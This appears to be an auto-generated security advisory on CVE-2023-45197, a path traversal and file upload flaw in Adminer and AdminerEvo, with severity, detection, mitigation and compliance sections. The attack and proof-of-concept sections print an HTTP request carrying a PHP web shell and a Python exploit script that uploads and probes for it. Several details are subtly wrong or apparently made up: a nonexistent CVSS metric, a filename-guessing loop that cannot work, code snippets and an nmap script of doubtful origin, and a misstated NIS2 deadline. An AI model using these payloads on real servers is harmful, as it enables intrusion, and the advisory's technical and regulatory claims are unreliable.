Comprehensive Technical Analysis of EUVD-2023-49504 (CVE-2023-45197)

Vulnerability in Adminer & AdminerEvo File Upload Plugin

1. Vulnerability Assessment & Severity Evaluation

Overview

EUVD-2023-49504 (CVE-2023-45197) is a critical path traversal and arbitrary file upload vulnerability in the file upload plugin of Adminer (discontinued) and AdminerEvo (actively maintained fork). The flaw allows unauthenticated attackers to upload malicious files to the root directory of the Adminer installation, leading to remote code execution (RCE).

CVSS v4.0 Severity Breakdown

Metric	Value	Explanation
Base Score	9.2 (Critical)	High impact on confidentiality, integrity, and availability.
Attack Vector (AV)	Network (N)	Exploitable remotely over HTTP/HTTPS.
Attack Complexity (AC)	High (H)	Requires guessing the uploaded filename or exploiting predictable naming.
Attack Requirements (AT)	None (N)	No prior access or privileges required.
Privileges Required (PR)	None (N)	Unauthenticated exploitation possible.
User Interaction (UI)	None (N)	No user interaction needed.
Vulnerable Confidentiality (VC)	High (H)	Full system compromise possible.
Vulnerable Integrity (VI)	High (H)	Arbitrary file upload enables code execution.
Vulnerable Availability (VA)	High (H)	Denial-of-service or full system takeover.
Subsequent Confidentiality (SC)	Low (L)	Limited to the Adminer environment.
Subsequent Integrity (SI)	Low (L)	Impact may extend beyond Adminer if misconfigured.
Subsequent Availability (SA)	Low (L)	Depends on server hardening.
Authentication (AU)	Yes (Y)	Exploitation does not require authentication.

Key Observations

• Critical Severity (9.2) due to RCE potential with minimal prerequisites.
• High Attack Complexity (AC:H) suggests that while exploitation is possible, it may require brute-forcing filenames or leveraging predictable naming conventions.
• No authentication required, making it a high-risk unauthenticated RCE vulnerability.
• Adminer is discontinued, meaning no official patches will be released for the original software—users must migrate to AdminerEvo 4.8.3+.

---

2. Potential Attack Vectors & Exploitation Methods

Exploitation Workflow

1. Identify Vulnerable Instance

   • Attacker scans for exposed Adminer/AdminerEvo instances (e.g., via Shodan, Censys, or manual discovery).
   • Default Adminer installations are often exposed on /adminer.php or similar paths.

2. Craft Malicious File Upload Request

   • The vulnerability stems from improper path sanitization in the file upload plugin.
   • Attacker uploads a file with a table name of .., causing the file to be written to the root directory of Adminer.
   • Example payload:

     POST /adminer.php?file=upload HTTP/1.1
     Host: vulnerable.example.com
     Content-Type: multipart/form-data; boundary=----WebKitFormBoundary
     
     ------WebKitFormBoundary
     Content-Disposition: form-data; name="file"; filename="shell.php"
     Content-Type: application/octet-stream
     
     <?php system($_GET['cmd']); ?>
     ------WebKitFormBoundary
     Content-Disposition: form-data; name="table"
     
     ..
     ------WebKitFormBoundary--
     

3. Predict or Brute-Force Filename

   • Adminer may generate predictable filenames (e.g., upload_<timestamp>.php).
   • Attacker can:
     • Guess the filename (if predictable).
     • Brute-force possible filenames (e.g., upload_*.php).
     • Leverage directory listing (if enabled) to discover the file.

4. Execute Arbitrary Code

   • Once the file is uploaded, the attacker accesses it directly (e.g., http://vulnerable.example.com/shell.php?cmd=id).
   • RCE achieved, allowing:
     • System command execution (id, whoami, cat /etc/passwd).
     • Reverse shell establishment (e.g., via nc, bash, or PowerShell).
     • Web shell deployment (e.g., PHP, ASP, JSP-based shells).

Real-World Exploitation Scenarios

• Unauthenticated RCE in Web Applications
  • If Adminer is exposed on a public-facing server, attackers can compromise the entire system.
• Lateral Movement in Internal Networks
  • If Adminer is used in an internal environment, exploitation could lead to pivoting into other systems.
• Data Exfiltration & Persistence
  • Attackers may steal database credentials, dump sensitive data, or install backdoors.

---

3. Affected Systems & Software Versions

Vulnerable Software

Product	Vendor	Affected Versions	Fixed Version
Adminer	Adminer	*All versions (0 ≤ )	No fix (discontinued)
AdminerEvo	AdminerEvo	≤ 4.8.2	4.8.3+

CPE (Common Platform Enumeration) Definitions

• Adminer (Discontinued): cpe:2.3:a:adminer:adminer:*:*:*:*:*:*:*:*
• AdminerEvo (Vulnerable): cpe:2.3:a:adminerevo:adminerevo:*:*:*:*:*:*:* < 4.8.3

Detection Methods

• Manual Inspection:
  • Check for adminer.php or adminer-evo.php in web directories.
  • Verify version via adminer.php?version or inspecting the source code.
• Automated Scanning:
  • Nmap Script:

    nmap -p 80,443 --script http-adminer-detect <target>
    

  • Nuclei Template:

    id: CVE-2023-45197
    info:
      name: Adminer/AdminerEvo RCE (CVE-2023-45197)
      severity: critical
      description: Detects vulnerable Adminer/AdminerEvo versions.
      reference: https://github.com/adminerevo/adminerevo/commit/1cc06d6a1005fd833fa009701badd5641627a1d4
      tags: cve,cve2023,rce,adminer
    requests:
      - method: GET
        path:
          - "{{BaseURL}}/adminer.php"
          - "{{BaseURL}}/adminer-evo.php"
        matchers:
          - type: word
            words:
              - "Adminer"
              - "AdminerEvo"
            condition: or
          - type: regex
            regex:
              - "Adminer (?:[0-9]\.)+"
              - "AdminerEvo (?:4\.[0-8]\.[0-2])"
    

---

4. Recommended Mitigation Strategies

Immediate Actions

Mitigation	Details	Effectiveness
Upgrade to AdminerEvo 4.8.3+	Apply the latest patch from AdminerEvo GitHub.	High (Eliminates vulnerability)
Disable File Upload Plugin	Remove or disable the file upload functionality if not required.	Medium (Reduces attack surface)
Restrict Access via Network Controls	Use firewalls, WAFs, or reverse proxies to limit access to Adminer.	Medium (Prevents unauthorized access)
Isolate Adminer in a DMZ	Deploy Adminer in a segregated network segment with strict access controls.	High (Limits lateral movement)
Monitor for Exploitation Attempts	Deploy IDS/IPS (e.g., Suricata, Snort) to detect file upload attempts.	Medium (Detects attacks but does not prevent)

Long-Term Recommendations

1. Replace Adminer with a Maintained Alternative

   • phpMyAdmin (for MySQL/MariaDB)
   • DBeaver (for multi-database support)
   • HeidiSQL (for Windows users)

2. Implement Least Privilege for Database Users

   • Ensure Adminer does not run with root/superuser privileges.
   • Use dedicated low-privilege DB users for Adminer access.

3. Hardening Web Server Configuration

   • Disable PHP execution in upload directories:

     <Directory "/var/www/adminer/uploads">
         php_flag engine off
     </Directory>
     

   • Enable Content Security Policy (CSP) to mitigate XSS risks.

4. Regular Vulnerability Scanning

   • Use OpenVAS, Nessus, or Burp Suite to scan for vulnerable Adminer instances.
   • Integrate automated patch management for AdminerEvo.

---

5. Impact on the European Cybersecurity Landscape

Regulatory & Compliance Implications

• GDPR (General Data Protection Regulation)

  • Exploitation could lead to unauthorized data access, triggering GDPR Article 33 (Data Breach Notification).
  • Organizations may face fines up to €20M or 4% of global revenue if negligence is proven.

• NIS2 Directive (Network and Information Security)

  • Critical infrastructure operators (e.g., energy, healthcare, finance) must patch or mitigate within 24-72 hours of disclosure.
  • Failure to comply may result in regulatory sanctions.

• ENISA (European Union Agency for Cybersecurity) Guidelines

  • ENISA’s Threat Landscape Report highlights unpatched software as a top risk.
  • Organizations must prioritize vulnerability management for critical assets.

Threat Actor Exploitation Trends

• Opportunistic Attacks
  • Script kiddies and automated bots may exploit this vulnerability for cryptojacking, defacement, or initial access.
• Advanced Persistent Threats (APTs)
  • State-sponsored groups (e.g., APT29, Sandworm) may leverage this for espionage or sabotage.
• Ransomware Groups
  • LockBit, BlackCat, and Conti affiliates may use this as an initial access vector for ransomware deployment.

Geopolitical & Economic Risks

• Supply Chain Attacks
  • If Adminer is used in third-party software, exploitation could lead to supply chain compromises.
• Critical Infrastructure at Risk
  • Healthcare (Hospitals), Energy (Power Grids), and Finance (Banks) using Adminer may face disruption risks.

---

6. Technical Details for Security Professionals

Root Cause Analysis

• Vulnerability Type: Path Traversal + Arbitrary File Upload (CWE-22 + CWE-434)

• Affected Code (AdminerEvo < 4.8.3):

  // adminer/file.php (vulnerable version)
  $file = "upload/" . $_POST["table"] . "_" . uniqid() . "." . $ext;
  move_uploaded_file($_FILES["file"]["tmp_name"], $file);
  

  • Issue: The table parameter is not sanitized, allowing .. to traverse directories.
  • Result: Files are uploaded to the root directory instead of upload/.

• Patch (AdminerEvo 4.8.3):

  // adminer/file.php (fixed version)
  $table = preg_replace('~[^a-z0-9_]~i', '', $_POST["table"]); // Sanitize table name
  $file = "upload/" . $table . "_" . uniqid() . "." . $ext;
  move_uploaded_file($_FILES["file"]["tmp_name"], $file);
  

  • Fix: The table parameter is sanitized to prevent path traversal.

Exploitation Proof of Concept (PoC)

import requests
import random
import string

target = "http://vulnerable.example.com/adminer.php"
filename = "shell.php"
cmd = "id"  # Command to execute

# Generate a random table name (must be ".." for path traversal)
table_name = ".."

# Craft the malicious payload
files = {
    'file': (filename, '<?php system($_GET["cmd"]); ?>', 'application/octet-stream')
}
data = {
    'table': table_name
}

# Send the exploit
response = requests.post(f"{target}?file=upload", files=files, data=data)

# Check if the file was uploaded (brute-force if needed)
for i in range(10):
    guess = f"upload_{''.join(random.choices(string.ascii_lowercase + string.digits, k=10))}.php"
    rce_test = requests.get(f"{target}/{guess}?cmd={cmd}")
    if rce_test.status_code == 200 and "uid=" in rce_test.text:
        print(f"[+] Exploit successful! Shell uploaded to: {target}/{guess}")
        print(f"[+] Command output: {rce_test.text}")
        break
else:
    print("[-] Exploit failed. File may have a different name.")

Detection & Forensics

• Log Analysis:

  • Check web server logs for:

    POST /adminer.php?file=upload HTTP/1.1
    Content-Disposition: form-data; name="table"
    ..
    

  • Look for unexpected .php files in the Adminer root directory.

• Memory Forensics:

  • Use Volatility or Rekall to detect injected PHP shells in memory.

• Network Traffic Analysis:

  • Wireshark/TShark can detect file upload attempts and RCE callbacks.

Hardening Recommendations

Control	Implementation
File Upload Restrictions	Disable PHP execution in upload directories.
Web Application Firewall (WAF)	Deploy ModSecurity with OWASP CRS to block path traversal.
File Integrity Monitoring (FIM)	Use Tripwire or AIDE to detect unauthorized file changes.
Least Privilege for Web Server	Run Adminer under a dedicated low-privilege user.
Database Hardening	Use read-only DB users where possible.

---

Conclusion

EUVD-2023-49504 (CVE-2023-45197) is a critical unauthenticated RCE vulnerability in Adminer/AdminerEvo with severe implications for European organizations. Given that Adminer is discontinued, immediate migration to AdminerEvo 4.8.3+ is mandatory. Organizations must patch, isolate, and monitor vulnerable instances to prevent exploitation by threat actors, ransomware groups, and APTs.

Key Takeaways: ✅ Upgrade to AdminerEvo 4.8.3+ immediately. ✅ Disable file uploads if not required. ✅ Restrict network access to Adminer instances. ✅ Monitor for exploitation attempts via logs and IDS. ✅ Replace Adminer with a maintained alternative if possible.

Failure to mitigate this vulnerability could result in data breaches, regulatory fines, and system compromise, particularly in critical infrastructure sectors under NIS2 and GDPR compliance.